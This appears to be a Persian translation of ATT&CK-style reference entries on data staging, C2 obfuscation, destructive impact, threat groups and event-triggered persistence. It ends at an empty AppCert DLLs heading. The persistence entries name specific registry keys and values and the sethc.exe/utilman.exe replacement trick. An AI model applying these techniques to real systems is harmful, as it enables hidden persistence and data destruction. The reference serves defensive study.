دشمنان ممکن است داده‌های جمع‌آوری‌شده را قبل از Exfiltration در یک مکان یا فهرست مرکزی مرحله‌بندی کنند. داده ها ممکن است در فایل های جداگانه نگهداری شوند یا از طریق تکنیک هایی مانند آرشیو داده های جمع آوری شده در یک فایل ترکیب شوند. ممکن است از پوسته‌های فرمان تعاملی استفاده شود، و عملکرد رایج در cmd و bash ممکن است برای کپی کردن داده‌ها در یک مکان مرحله‌بندی استفاده شود.در محیط‌های ابری، دشمنان ممکن است داده‌ها را در یک نمونه خاص یا ماشین مجازی قبل از استخراج، مرحله‌بندی کنند. حریف ممکن است Cloud Instance ایجاد کند و داده ها را در آن نمونه مرحله بندی کند. دشمنان ممکن است انتخاب کنند که داده ها را از یک شبکه قربانی در یک مکان متمرکز قبل از Exfiltration مرحله بندی کنند تا تعداد اتصالات ایجاد شده به سرورC2 خود را به حداقل برسانند و از شناسایی بهتر فرار کنند.

رمزگذاری داده ها

Data Encoding

دشمنان ممکن است داده ها را رمزگذاری کنند تا محتوای ترافیک فرمان و کنترل را دشوارتر کنند. اطلاعات فرمان و کنترل (C2) را می توان با استفاده از یک سیستم رمزگذاری داده استاندارد کدگذاری کرد. استفاده از رمزگذاری داده‌ها ممکن است مطابق با مشخصات پروتکل موجود باشد و شامل استفاده از ASCII، Unicode، Base64,MIME یا دیگر سیستم‌های کدگذاری باینری به متن و کاراکتر می‌شود. برخی از سیستم های رمزگذاری داده ها نیز ممکن است منجر به فشرده سازی داده ها شوند، مانند gzip.

مبهم سازی داده ها

Data Obfuscation

دشمنان ممکن است فرمان و کنترل ترافیک را مخدوش کنند تا تشخیص آن را دشوارتر کنند. ارتباطات فرماندهی و کنترل مخفی هستند (اما نه لزوماً رمزگذاری شده) در تلاشی برای دشوارتر کردن محتوا برای کشف یا رمزگشایی و ایجاد ارتباط کمتر آشکار و پنهان کردن دستورات از دیده شدن. این روش‌های بسیاری را شامل می‌شود، مانند افزودن داده‌های ناخواسته به ترافیک پروتکل، استفاده از steganography، یا جعل هویت پروتکل‌های قانونی.

وضوح دینامیک

Dynamic Resolution

دشمنان ممکن است به صورت پویا با زیرساخت‌های فرماندهی و کنترل ارتباط برقرار کنند تا از تشخیص‌ها و اصلاحات رایج اجتناب کنند. این ممکن است با استفاده از بدافزاری که الگوریتم مشترکی با زیرساختی که دشمن برای دریافت ارتباطات بدافزار استفاده می‌کند، به اشتراک می‌گذارد. این محاسبات را می توان برای تنظیم پویا پارامترهایی مانند نام دامنه، آدرس IP یا شماره پورت مورد استفاده بدافزار برای فرمان و کنترل استفاده کرد. دشمنان ممکن است از وضوح پویا برای هدف کانال های بازگشتی استفاده کنند. هنگامی که تماس با فرمان و کنترل اولیه سرور مخرب از بین می رود، ممکن است از وضوح پویا به عنوان وسیله ای برای برقراری مجدد فرمان و کنترل استفاده کند.

محدودیت اندازه انتقال داده

Data Transfer Size Limits

دشمن ممکن است داده ها را به جای فایل های کامل در قطعات با اندازه ثابت استخراج کند یا اندازه بسته ها را زیر آستانه های خاص محدود کند. این رویکرد ممکن است برای جلوگیری از ایجاد هشدار آستانه انتقال داده شبکه استفاده شود.

تخریب داده ها

Data Destruction

دشمنان ممکن است داده ها و فایل ها را در سیستم های خاص یا به تعداد زیاد در یک شبکه از بین ببرند تا دسترسی به سیستم ها، خدمات و منابع شبکه را قطع کنند. تخریب داده‌ها احتمالاً داده‌های ذخیره‌شده را با تکنیک‌های پزشکی قانونی از طریق بازنویسی فایل‌ها یا داده‌ها در درایوهای محلی و راه دور غیرقابل بازیابی می‌کند. دستورات رایج حذف فایل های سیستم عامل مانند del و rm اغلب فقط نشانگرهای فایل ها را بدون پاک کردن محتویات خود فایل ها حذف می کنند و فایل ها را با روش پزشکی قانونی مناسب قابل بازیابی می کنند. این رفتار با Disk Content Wipe و Disk Structure Wipe متمایز است، زیرا فایل های فردی به جای بخش هایی از دیسک ذخیره سازی یا ساختار منطقی دیسک، از بین می روند.دشمنان ممکن است تلاش کنند تا فایل‌ها و دایرکتوری‌ها را با داده‌های تولید شده به‌طور تصادفی بازنویسی کنند تا آن‌ها را غیرقابل بازیابی کنند. در برخی موارد از فایل‌های تصویری سیاسی جهت بازنویسی داده‌ها استفاده شده است. برای به حداکثر رساندن تأثیر بر سازمان هدف در عملیاتی که هدف قطع دسترسی در سطح شبکه است، بدافزار طراحی شده برای از بین بردن داده ها ممکن است دارای ویژگی های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک های اضافی مانند حساب های معتبر، تخلیه اعتبار سیستم عامل، و SMB/ باشد.

داده ها برای تاثیر رمزگذاری شده اند

Data Encrypted for Impact

دشمنان ممکن است داده ها را در سیستم های هدف یا تعداد زیادی از سیستم ها در یک شبکه رمزگذاری کنند تا دسترسی به سیستم و منابع شبکه را قطع کنند. آنها می توانند با رمزگذاری فایل ها یا داده ها در درایوهای محلی و راه دور و ممانعت از دسترسی به یک کلید رمزگشایی، سعی کنند داده های ذخیره شده را غیرقابل دسترسی نشان دهند. این ممکن است به منظور دریافت غرامت پولی از قربانی در ازای رمزگشایی یا یک کلید رمزگشایی (باج‌افزار) یا غیرقابل دسترس کردن دائمی داده‌ها در مواردی که کلید ذخیره یا منتقل نشده است، انجام شود. در مورد باج افزار، معمول است که فایل های کاربر معمولی مانند اسناد آفیس، فایل های PDF، تصاویر، ویدئوها، فایل های صوتی، متن و کد منبع رمزگذاری می شوند. در برخی موارد، دشمنان ممکن است فایل‌های سیستم، پارتیشن‌های دیسک و MBR را رمزگذاری کنند.برای به حداکثر رساندن تأثیر بر سازمان هدف، بدافزار طراحی‌شده برای رمزگذاری داده‌ها ممکن است دارای ویژگی‌های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک‌های حمله دیگر مانند حساب‌های معتبر، تخلیه اعتبار سیستم‌عامل، و اشتراک‌های مدیریت SMB/Windows باشد.در محیط‌های ابری، اشیاء ذخیره‌سازی در حساب‌های در معرض خطر نیز ممکن است رمزگذاری شوند.

دستکاری داده

Data Manipulation

دشمنان ممکن است داده ها را به منظور دستکاری نتایج خارجی یا مخفی کردن فعالیت ها درج، حذف یا دستکاری کنند. با دستکاری داده ها، دشمنان ممکن است سعی کنند بر فرآیند کسب و کار، درک سازمانی یا تصمیم گیری تأثیر بگذارند.نوع اصلاح و تأثیری که خواهد داشت به کاربرد و فرآیند هدف و همچنین اهداف و مقاصد دشمن بستگی دارد. برای سیستم‌های پیچیده، یک دشمن احتمالاً به تخصص ویژه و احتمالاً دسترسی به نرم‌افزار تخصصی مرتبط با سیستم نیاز دارد که معمولاً از طریق یک کمپین طولانی جمع‌آوری اطلاعات به دست می‌آید تا تأثیر مطلوب داشته باشد.

تخریب

Defacement

دشمنان ممکن است محتوای بصری موجود در داخل یا خارج از یک شبکه سازمانی را تغییر دهند. دلایل Deacement شامل ارسال پیام، ارعاب، یا ادعای اعتبار (احتمالاً نادرست) برای نفوذ است. تصاویر آزاردهنده یا توهین‌آمیز ممکن است به عنوان بخشی از Defacement به منظور ایجاد ناراحتی در کاربر یا تحت فشار قرار دادن پیام‌های همراه مورد استفاده قرار گیرند.

پاک کردن دیسک

Disk Wipe

دشمنان ممکن است داده های خام دیسک را در سیستم های خاص یا به تعداد زیاد در یک شبکه پاک یا خراب کنند تا دسترسی به سیستم و منابع شبکه را قطع کنند. با دسترسی مستقیم نوشتن به دیسک، دشمنان ممکن است سعی کنند بخشی از داده های دیسک را بازنویسی کنند. ممکن است دشمنان قسمت‌های دلخواه داده‌های دیسک را پاک کنند و/یا ساختارهای دیسک مانند رکورد اصلی راه‌اندازی ( MBR) را پاک کنند. ممکن است سعی شود تمام بخش‌های دیسک پاک شود. برای به حداکثر رساندن تأثیر بر سازمان هدف در عملیاتی که هدف آن قطع دسترسی در سراسر شبکه است، بدافزار مورد استفاده برای پاک کردن دیسک‌ها ممکن است دارای ویژگی‌های کرم مانند برای انتشار در سراسر شبکه با استفاده از تکنیک‌های اضافی مانند حساب‌های معتبر، تخلیه اعتبار سیستم‌عامل باشد.

گروه تهدیدی است

Dark Caracal

Dark Caracal گروه تهدیدی است که به اداره کل امنیت عمومی لبنان ( GDGS) نسبت داده شده و حداقل از سال 2012 فعالیت داشته است.

یک گروه تهدید مظنون کره جنوبی است

Darkhotel

Darkhotel یک گروه تهدید مظنون کره جنوبی است که حداقل از سال 2004 قربانیان را عمدتاً در شرق آسیا هدف قرار داده است. نام این گروه بر اساس عملیات جاسوسی سایبری است که از طریق شبکه‌های اینترنتی هتل‌ها علیه مدیران مسافر و سایر مهمانان منتخب انجام شده است. Darkhotel همچنین کمپین‌های spearphishing و قربانیان را از طریق شبکه‌های همتا به همتا و اشتراک‌گذاری فایل انجام داده است.

یک گروه تهدید است

DarkHydrus

DarkHydrus یک گروه تهدید است که حداقل از سال 2016 آژانس‌های دولتی و موسسات آموزشی در خاورمیانه را هدف قرار داده است. این گروه به شدت از ابزارهای منبع باز و بارهای سفارشی برای انجام حملات استفاده می کند.

یک عامل تهدید با انگیزه مالی

DarkVishnya

DarkVishnya یک عامل تهدید با انگیزه مالی است که موسسات مالی در اروپای شرقی را هدف قرار می دهد. در سال 2017-2018 این گروه به حداقل 8 بانک در این منطقه حمله کرد..

یک گروه تهدید کننده مشکوک چینی است

Deep Panda

Deep Panda یک گروه تهدید کننده مشکوک چینی است که بسیاری از صنایع از جمله دولتی، دفاعی، مالی و مخابراتی را هدف قرار می دهد. نفوذ به شرکت مراقبت‌های بهداشتی Anthem به Deep Panda نسبت داده شده است. این گروه با نام‌های Shell Crew، WebMasters، KungFu Kittens و PinkPanther نیز شناخته می‌شود. Deep Panda همچنین به نظر می رسد به عنوان Black Vine بر اساس انتساب نام هر دو گروه به نفوذ Anthem شناخته می شود. برخی از تحلیلگران Deep Panda و را به عنوان یک گروه دنبال می‌کنند، اما اطلاعات منبع باز مشخص نیست که آیا گروه ها یکسان هستند یا خیر.

یک گروه جاسوسی سایبری

Dragonfly

Dragonfly یک گروه جاسوسی سایبری است که حداقل از سال 2011 فعال بوده است. آنها در ابتدا شرکت های دفاعی و هوانوردی را هدف قرار دادند اما در اوایل سال 2013 تمرکز خود را روی بخش انرژی تغییر دادند. آنها همچنین شرکت های مرتبط با سیستم های کنترل صنعتی را هدف قرار داده اند. گروه مشابهی در سال 2015 ظهور کرد و توسط سیمانتک با نام . شناسایی شد. بحث بر سر میزان همپوشانی بین Dragonfly و وجود دارد، اما شواهد کافی وجود دارد که منجر به ردیابی آنها به عنوان دو گروه جداگانه شود.

Dragonfly 2.0

Dragonfly 2.0یک گروه مشکوک روسی است که نهادهای دولتی و چندین بخش زیرساخت حیاتی ایالات متحده را حداقل از دسامبر 2015 هدف قرار داده است. بحث بر سر میزان همپوشانی بین Dragonfly 2.0و Dragonfly وجود دارد، اما شواهد کافی برای اثبات وجود دارد. منجر به ردیابی آنها به عنوان دو گروه جداگانه می شود.

یک گروه تهدید است

DragonOK

DragonOK یک گروه تهدید است که سازمان های ژاپنی را با ایمیل های فیشینگ هدف قرار داده است. به دلیل همپوشانی TTPها، از جمله ابزارهای سفارشی مشابه، تصور می شود DragonOK ارتباط مستقیم یا غیرمستقیم با گروه تهدید Moafee دارد.

یک گروه تهدید است

Dust Storm

طوفان گرد و غبار یک گروه تهدید است که چندین صنعت را در ژاپن، کره جنوبی، ایالات متحده، اروپا و چندین کشور آسیای جنوب شرقی هدف قرار داده است.

فرار دفاعی

Defense Evasion

فرار دفاعی شامل تکنیک هایی است که دشمنان برای جلوگیری از شناسایی در طول سازش خود از آنها استفاده می کنند. تکنیک های مورد استفاده برای فرار دفاعی شامل حذف/غیرفعال کردن نرم افزارهای امنیتی یا مبهم کردن/رمزگذاری داده ها و اسکریپت ها است.

کشف داده ها

Data discovery

کشف داده ها شامل شناسایی و مکان یابی داده های حساس یا تنظیم شده برای محافظت کافی یا حذف ایمن آن ها می شود. یکی از بزرگ‌ترین روندهای هوش تجاری در سال‌های اخیر، کشف داده‌ها، برای بسیاری از تیم‌های امنیتی سازمانی اولویت دارد، زیرا یک جزء حیاتی در آمادگی انطباق است.

سوءاستفاده

Exploit

سوءاستفاده یک برنامه یا قطعه کد است که برای یافتن و استفاده از نقص امنیتی یا آسیب‌پذیری در برنامه یا سیستم رایانه و معمولاً برای اهداف مخرب مانند نصب بدافزار طراحی شده است. سوء استفاده خود بدافزار نیست، بلکه روشی است که توسط مجرمان سایبری برای ارائه بدافزار استفاده می‌شود.

ایجاد حساب‌ها

Establish Accounts

دشمنان ممکن است حساب‌هایی را با خدماتی که می‌توانند در طول هدف‌گیری استفاده شوند ایجاد کنند. دشمنان می‌توانند حساب‌هایی ایجاد کنند که بتوان از آنها برای ساختن شخصیت‌های مختلف برای عملیات‌های بعدی استفاده کرد. توسعه شخصی شامل توسعه اطلاعات عمومی، حضور، سابقه و وابستگی‌های مناسب است. این توسعه را می‌توان در رسانه‌های اجتماعی، وب‌سایت یا سایر اطلاعات در دسترس عموم که می‌توان در طول عملیات با استفاده از آن شخصیت یا هویت، ارجاع داد و برای مشروعیت آن مورد بررسی قرار داد، اعمال کرد. برای عملیاتی که شامل مهندسی اجتماعی می‌شود، استفاده از شخصیت آنلاین ممکن است مهم باشد. این پرسوناها ممکن است ساختگی باشند و یا جعل هویت افراد واقعی باشند. شخصیت ممکن است در یک سایت واحد یا در چندین سایت وجود داشته باشد (مثلاً: فیس بوک، لینکدین، توییتر، گوگل، گیت هاب، داکر هاب، و غیره). ایجاد یک شخصیت ممکن است مستلزم ایجاد اسناد اضافی باشد تا واقعی به نظر برسد. این می‌تواند شامل پر کردن اطلاعات نمایه، توسعه شبکه‌های اجتماعی، یا ترکیب عکس‌ها باشد. ایجاد حساب‌ها همچنین می‌تواند شامل ایجاد حساب‌هایی با ارائه‌دهندگان ایمیل باشد، که ممکن است مستقیماً برای فیشینگ برای اطلاعات یا فیشینگ استفاده شود.

ایجاد حساب‌ها: حساب‌های رسانه‌های اجتماعی

Establish Accounts: Social Media Accounts

دشمنان ممکن است حساب‌های رسانه‌های اجتماعی را ایجاد و پرورش دهند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. دشمنان می‌توانند حساب‌های رسانه‌های اجتماعی ایجاد کنند که می‌توانند برای ساختن شخصیت برای عملیات‌های بعدی استفاده شوند. توسعه شخصی شامل توسعه اطلاعات عمومی، حضور، سابقه و وابستگی های مناسب است. برای عملیاتی که شامل مهندسی اجتماعی می شود، استفاده از یک شخصیت در رسانه های اجتماعی ممکن است مهم باشد. این پرسوناها ممکن است ساختگی باشند و یا جعل هویت افراد واقعی باشند. پرسونا ممکن است در یک سایت رسانه اجتماعی یا در چندین سایت (مثلاً فیس بوک، لینکدین، توییتر و غیره) وجود داشته باشد. ایجاد یک پرسونا در رسانه های اجتماعی ممکن است مستلزم ایجاد اسناد اضافی برای واقعی به نظر رسیدن آنها باشد. این می‌تواند شامل پر کردن اطلاعات نمایه، توسعه شبکه‌های اجتماعی یا ترکیب عکس باشد. هنگامی که یک شخصیت ایجاد شد، یک دشمن می تواند از آن برای ایجاد ارتباط با اهداف مورد نظر استفاده کند. این ارتباطات ممکن است مستقیم باشد یا ممکن است شامل تلاش برای برقراری ارتباط از طریق دیگران باشد. این حساب‌ها ممکن است در مراحل دیگر چرخه حیات دشمن، مانند هنگام دسترسی اولیه (مثلاً Spearphishing از طریق سرویس) مورد استفاده قرار گیرند.

ایجاد حساب‌ها: حساب‌های ایمیل

Establish Accounts: Email Accounts

دشمنان ممکن است حساب‌های ایمیلی ایجاد کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. دشمنان می‌توانند از حساب‌های ایجاد شده با ارائه دهندگان ایمیل برای پیش‌برد عملیات خود استفاده کنند، مانند اعمال نفوذ آنها برای انجام فیشینگ برای اطلاعات یا فیشینگ. همچنین ممکن است دشمنان برای پرورش یک شخصیت در اطراف حساب ایمیل، مانند استفاده از حساب‌های رسانه‌های اجتماعی، اقداماتی انجام دهند تا شانس موفقیت رفتارهای بعدی را افزایش دهند. حساب‌های ایمیل ایجاد شده همچنین می‌توانند در دستیابی به زیرساخت‌ها (مثلاً دامنه‌ها) استفاده شوند. برای کاهش احتمال بازگرداندن فیزیکی عملیات به خود، دشمنان ممکن است از خدمات ایمیل یکبار مصرف استفاده کنند.

بهره برداری از برنامه عمومی

Exploit Public-Facing Application

ممکن است دشمنان با استفاده از نرم‌افزار، داده‌ها یا دستورات از ضعف رایانه یا برنامه‌ای که در اینترنت قرار دارد استفاده کنند تا رفتار ناخواسته یا پیش‌بینی نشده‌ای ایجاد کنند. ضعف در سیستم می تواند یک اشکال، یک نقص یا یک آسیب پذیری طراحی باشد. این برنامه‌ها اغلب وب‌سایت‌ها هستند، اما می‌توانند شامل پایگاه‌های داده مانند ( SQL)، خدمات استاندارد مانند SMB یا SSH، پروتکل‌های مدیریت و مدیریت دستگاه شبکه مانند SNMP و Smart Install باشند. و سایر برنامه‌های کاربردی با سوکت‌های باز قابل دسترسی به اینترنت، مانند سرورهای وب و خدمات مرتبط. بسته به نقصی که مورد بهره برداری قرار می گیرد، ممکن است شامل بهره برداری برای فرار از دفاع باشد. اگر یک برنامه بر روی زیرساخت مبتنی بر ابر میزبانی شود و یا کانتینری باشد، سوء استفاده از آن ممکن است منجر به به خطر افتادن نمونه یا کانتینر اصلی شود. این می‌تواند به دشمن امکان دسترسی به APIهای ابری یا کانتینری را بدهد، از دسترسی میزبان کانتینر از طریق Escape به Host سوء استفاده کند یا از سیاست‌های ضعیف هویت و مدیریت دسترسی استفاده کند.

خدمات از راه دور خارجی

External Remote Services

دشمنان ممکن است از خدمات راه دور خارجی برای دسترسی اولیه و یا تداوم در یک شبکه استفاده کنند. سرویس‌های راه دور مانند VPN، Citrix و سایر مکانیسم‌های دسترسی به کاربران اجازه می‌دهند تا از مکان‌های خارجی به منابع شبکه داخلی سازمانی متصل شوند. اغلب دروازه های خدمات راه دور وجود دارند که اتصالات و احراز هویت اعتبار این سرویس ها را مدیریت می کنند. خدماتی مانند Windows Remote Management و VNC نیز می توانند به صورت خارجی استفاده شوند. دسترسی به حساب‌های معتبر برای استفاده از این سرویس اغلب یک الزام است، که می‌توان آن را از طریق اعتبارسنجی فارمینگ یا با دریافت اعتبار از کاربران پس از به خطر انداختن شبکه سازمانی به دست آورد. دسترسی به خدمات از راه دور ممکن است به عنوان یک مکانیسم دسترسی اضافی یا مداوم در طول یک عملیات استفاده شود. همچنین ممکن است از طریق یک سرویس در معرض دید که نیازی به احراز هویت ندارد، دسترسی حاصل شود. در محیط‌های کانتینری، این ممکن است شامل یک Docker API در معرض، سرور Kubernetes API، kubelet یا برنامه وب مانند داشبورد Kubernetes باشد.

بهره برداری برای اجرای مشتری

Exploitation for Client Execution

دشمنان ممکن است از آسیب‌پذیری‌های نرم‌افزار در برنامه‌های مشتری برای اجرای کد سوء‌استفاده کنند. آسیب‌پذیری‌ها می‌توانند در نرم‌افزار به دلیل شیوه‌های کدگذاری ناامن وجود داشته باشند که می‌توانند منجر به رفتارهای پیش‌بینی نشده شوند. دشمنان می توانند از طریق بهره برداری هدفمند به منظور اجرای کد دلخواه از آسیب پذیری های خاص استفاده کنند. اغلب اوقات با ارزش ترین سوء استفاده ها برای یک جعبه ابزار تهاجمی آنهایی هستند که می توان از آنها برای به دست آوردن اجرای کد در یک سیستم راه دور استفاده کرد زیرا می توان از آنها برای دسترسی به آن سیستم استفاده کرد. کاربران انتظار دارند فایل‌های مربوط به برنامه‌هایی را که معمولاً برای انجام کار استفاده می‌کنند، ببینند، بنابراین به دلیل کاربرد زیاد، هدف مفیدی برای تحقیق و توسعه بهره‌برداری هستند.

باعث اجرای رویداد

Event Triggered Execution

دشمنان ممکن است با استفاده از مکانیسم‌های سیستمی که بر اساس رویدادهای خاص اجرا را آغاز می‌کنند، تداوم و/یا امتیازات را افزایش دهند. سیستم عامل های مختلف ابزارهایی برای نظارت و اشتراک در رویدادهایی مانند ورود به سیستم یا سایر فعالیت های کاربر مانند اجرای برنامه های کاربردی خاص / باینری دارند. دشمنان ممکن است از این مکانیسم ها به عنوان وسیله ای برای حفظ دسترسی دائمی به قربانی از طریق اجرای مکرر کد مخرب سوء استفاده کنند. پس از دسترسی به سیستم قربانی، دشمنان ممکن است محرک های رویداد را ایجاد/تغییر دهند تا به محتوای مخرب اشاره کنند که هر زمان که ماشه رویداد فراخوانی شود اجرا می شود. از آنجایی که اجرا می‌تواند توسط یک حساب با مجوزهای بالاتر، مانند حساب‌های SYSTEM یا سرویس، پروکسی شود، ممکن است یک دشمن بتواند از این مکانیسم‌های اجرایی راه‌اندازی شده برای افزایش امتیازات خود سوء استفاده کند.

باعث اجرای رویداد: تغییر انجمن فایل پیش‌فرض

Event Triggered Execution: Change Default File Association

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط یک ارتباط نوع فایل، پایداری را ایجاد کنند. هنگامی که یک فایل باز می شود، برنامه پیش فرض مورد استفاده برای باز کردن فایل (همچنین به آن ارتباط یا کنترل کننده فایل نیز گفته می شود) بررسی می شود. انتخاب‌های مرتبط فایل در رجیستری ویندوز ذخیره می‌شوند و می‌توانند توسط کاربران، مدیران، یا برنامه‌هایی که به رجیستری دسترسی دارند یا توسط مدیران با استفاده از ابزار داخلی assoc ویرایش شوند. برنامه‌ها می‌توانند ارتباط فایل را برای پسوند فایل معین تغییر دهند تا زمانی که فایلی با پسوند معین باز می‌شود، یک برنامه دلخواه را فراخوانی کند.

باعث اجرای رویداد: محافظ صفحه نمایش

Event Triggered Execution: Screensaver

دشمنان ممکن است با اجرای محتوای مخرب ناشی از عدم فعالیت کاربر تداوم داشته باشند. محافظ‌های صفحه برنامه‌هایی هستند که پس از یک زمان قابل تنظیم از عدم فعالیت کاربر اجرا می‌شوند و از فایل‌های اجرایی قابل حمل ( PE) با پسوند فایل scr. تشکیل شده‌اند. برنامه محافظ صفحه نمایشC:\Windows\System32\ در و C:\Windows\sysWOW64\ در سیستم‌های ویندوز 64 بیتی به همراه محافظ‌های صفحه همراه با نصب پایه ویندوز قرار دارد. تنظیمات محافظ صفحه زیر در رجیستری HKCU\Control Panel\Desktop\ذخیره می‌شوند و می‌توانند برای دستیابی به پایداری دستکاری شوند: SCRNSAVE.exe - روی مسیر PE مخرب تنظیم شده است. ScreenSaveActive - برای فعال کردن محافظ صفحه روی "1" تنظیم کنید. ScreenSaverIsSecure - روی '0' تنظیم کنید تا برای باز کردن قفل نیازی به رمز عبور نباشد. ScreenSaveTimeout - زمان عدم فعالیت کاربر را قبل از اجرای محافظ صفحه تنظیم می کند. دشمنان می توانند با تنظیم محافظ صفحه برای اجرای بدافزار پس از بازه زمانی مشخصی از عدم فعالیت کاربر، از تنظیمات محافظ صفحه برای حفظ پایداری استفاده کنند.

باعث اجرای رویداد: ابزار مدیریت ویندوز اشتراک رویداد

Event Triggered Execution: Windows Management Instrumentation Event Subscription

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط اشتراک رویداد (WMI) تداوم داشته باشند و امتیازات را افزایش دهند. WMI را می توان برای نصب فیلترهای رویداد، ارائه دهندگان، مصرف کنندگان و اتصالاتی که در هنگام وقوع یک رویداد تعریف شده کد را اجرا می کنند، استفاده کرد. نمونه‌هایی از رویدادهایی که ممکن است مشترک آنها باشند عبارتند از: زمان ساعت دیواری، ورود کاربر، یا زمان فعال بودن رایانه. دشمنان ممکن است از قابلیت‌های WMI برای اشتراک در یک رویداد و اجرای کد دلخواه در هنگام وقوع آن رویداد استفاده کنند و پایداری در یک سیستم را فراهم کنند. دشمنان همچنین ممکن است اسکریپت‌های WMI را در فایل‌های Windows Management Object (MOF) پسوندmof. که می‌تواند برای ایجاد اشتراک مخرب استفاده شود، کامپایل کنند. اجرای اشتراک WMI توسط فرآیند میزبان ارائه دهنده WMI (WmiPrvSe.exe) پروکسی می شود و بنابراین ممکن است منجر به افزایش امتیازات SYSTEM شود.

باعث اجرای رویداد: اصلاح پیکربندی پوسته یونیکس

Event Triggered Execution: Unix Shell Configuration Modification

دشمنان ممکن است از طریق اجرای دستورات مخربی که توسط پوسته کاربر راه اندازی می شوند، پایداری را ایجاد کنند. پوسته های یونیکس کاربر چندین اسکریپت پیکربندی را در نقاط مختلف در طول جلسه بر اساس رویدادها اجرا می کنند. به عنوان مثال، هنگامی که یک کاربر یک رابط خط فرمان را باز می کند یا از راه دور وارد سیستم می شود (مانند از طریق ( SSH)) ، پوسته ورود شروع می شود. پوسته ورود، اسکریپت‌ها را از سیستم (/etc) و فهرست اصلی کاربر (~/) برای پیکربندی محیط اجرا می‌کند. همه پوسته های ورود به سیستم در هنگام راه اندازی از /etc/profile استفاده می کنند. این اسکریپت های پیکربندی در سطح مجوز دایرکتوری خود اجرا می شوند و اغلب برای تنظیم متغیرهای محیطی، ایجاد نام مستعار و سفارشی کردن محیط کاربر استفاده می شوند. هنگامی که پوسته خارج می شود یا خاتمه می یابد، اسکریپت های پوسته اضافی برای اطمینان از خروج مناسب پوسته اجرا می شوند. دشمنان ممکن است با قرار دادن دستورات در اسکریپت‌هایی که به‌طور خودکار توسط شل اجرا می‌شوند، تلاش کنند پایداری را ایجاد کنند.

باعث اجرای رویداد: به دام انداختن

Event Triggered Execution: Trap

دشمنان ممکن است با اجرای محتوای مخربی که توسط یک سیگنال وقفه ایجاد می شود، پایداری را ایجاد کنند. دستور trap به برنامه ها و پوسته ها اجازه می دهد تا دستوراتی را که با دریافت سیگنال های وقفه اجرا می شوند را مشخص کنند. یک موقعیت رایج، اسکریپتی است که امکان خاتمه و مدیریت وقفه های معمول صفحه کلید مانند ctrl+c و ctrl+d را فراهم می کند. دشمنان می توانند از این برای ثبت کد استفاده کنند تا زمانی که پوسته با وقفه های خاصی به عنوان مکانیزم پایداری مواجه می شود، اجرا شود. دستورات Trap از فرمت‌های زیر سیگنال‌های «فهرست فرمان» هستند که «فهرست فرمان» در هنگام دریافت «سیگنال‌ها» اجرا می‌شود.

باعث اجرای رویداد: LC_LOAD_DYLIB اضافه

Event Triggered Execution: LC_LOAD_DYLIB Addition

دشمنان ممکن است با اجرای محتوای مخربی که توسط اجرای باینری های آلوده ایجاد می شود، تداوم داشته باشند. باینری های Mach-O دارای یک سری هدر هستند که برای انجام عملیات خاصی در هنگام بارگذاری یک باینری استفاده می شوند. هدر LC_LOAD_DYLIB در یک باینری Mach-O به macOS و OS X می گوید که کدام کتابخانه های پویا ( dylibs) را در طول زمان اجرا بارگیری کنند. تا زمانی که تنظیمات مربوط به بقیه فیلدها و وابستگی ها انجام شود، می توان این موارد را به صورت موقت به باینری کامپایل شده اضافه کرد. ابزارهای موجود برای انجام این تغییرات وجود دارد. دشمنان ممکن است هدرهای باینری Mach-O را تغییر دهند تا هر بار که باینری اجرا می شود، dylib های مخرب را بارگیری و اجرا کنند. اگرچه هر تغییری امضاهای دیجیتال روی باینری ها را باطل می کند، زیرا باینری در حال تغییر است، اما می توان به سادگی با حذف دستور LC_CODE_SIGNATURE از باینری، آن را اصلاح کرد تا امضا در زمان بارگذاری بررسی نشود.

باعث اجرای رویداد: Netsh Helper DLL

Event Triggered Execution: Netsh Helper DLL

دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های Netsh Helper راه اندازی شده است، پایداری را ایجاد کنند. Netsh.exe (همچنین به عنوان Netshell شناخته می شود) یک ابزار برنامه نویسی خط فرمان است که برای تعامل با پیکربندی شبکه یک سیستم استفاده می شود. این شامل قابلیت افزودن DLL های کمکی برای گسترش عملکرد ابزار است. مسیرهای DLL های کمکی netsh.exe ثبت شده در رجیستری ویندوز در HKLM\SOFTWARE\Microsoft\Netsh. وارد می شوند. دشمنان می توانند از DLL های کمکی netsh.exe برای شروع اجرای کد دلخواه به صورت مداوم استفاده کنند. این اجرا در هر زمانی که netsh.exe اجرا می‌شود انجام می‌شود، که می‌تواند به‌طور خودکار، با تکنیک تداوم دیگری، یا اگر نرم‌افزار دیگری (مثلاً VPN )در سیستم وجود داشته باشد که netsh.exe را به عنوان بخشی از عملکرد عادی آن اجرا می‌کند، انجام شود.

باعث اجرای رویداد: ویژگی های دسترسی

Event Triggered Execution: Accessibility Features

دشمنان ممکن است با اجرای محتوای مخرب ناشی از ویژگی‌های دسترسی، تداوم و/یا امتیازات را افزایش دهند. Windows دارای ویژگی‌های دسترس‌پذیری است که ممکن است قبل از ورود کاربر با یک کلید ترکیبی راه‌اندازی شوند (مثلاً زمانی که کاربر در صفحه ورود به سیستم ویندوز است). یک حریف می‌تواند نحوه راه‌اندازی این برنامه‌ها را برای دریافت یک خط فرمان یا درب پشتی بدون ورود به سیستم تغییر دهد. دو برنامه دسترسی رایج عبارتند از C:\Windows\System32\sethc.exe که با فشار دادن کلید shift پنج بار راه اندازی می شود و C:\Windows\System32\utilman.exe که با فشار دادن کلید ترکیبی Windows + U راه اندازی می شود. برنامه sethc.exe اغلب به عنوان "کلیدهای چسبنده" نامیده می شود و توسط دشمنان برای دسترسی غیرقانونی از طریق صفحه ورود به سیستم دسکتاپ راه دور استفاده شده است. بسته به نسخه ویندوز، حریف ممکن است به طرق مختلف از این ویژگی ها استفاده کند. روش‌های رایج مورد استفاده توسط دشمنان شامل جایگزینی باینری‌های ویژگی دسترسی یا اشاره‌گر ارجاع به این باینری‌ها در رجیستری است.

باعث اجرای رویداد: DLL های AppCert

Event Triggered Execution: AppCert DLLs

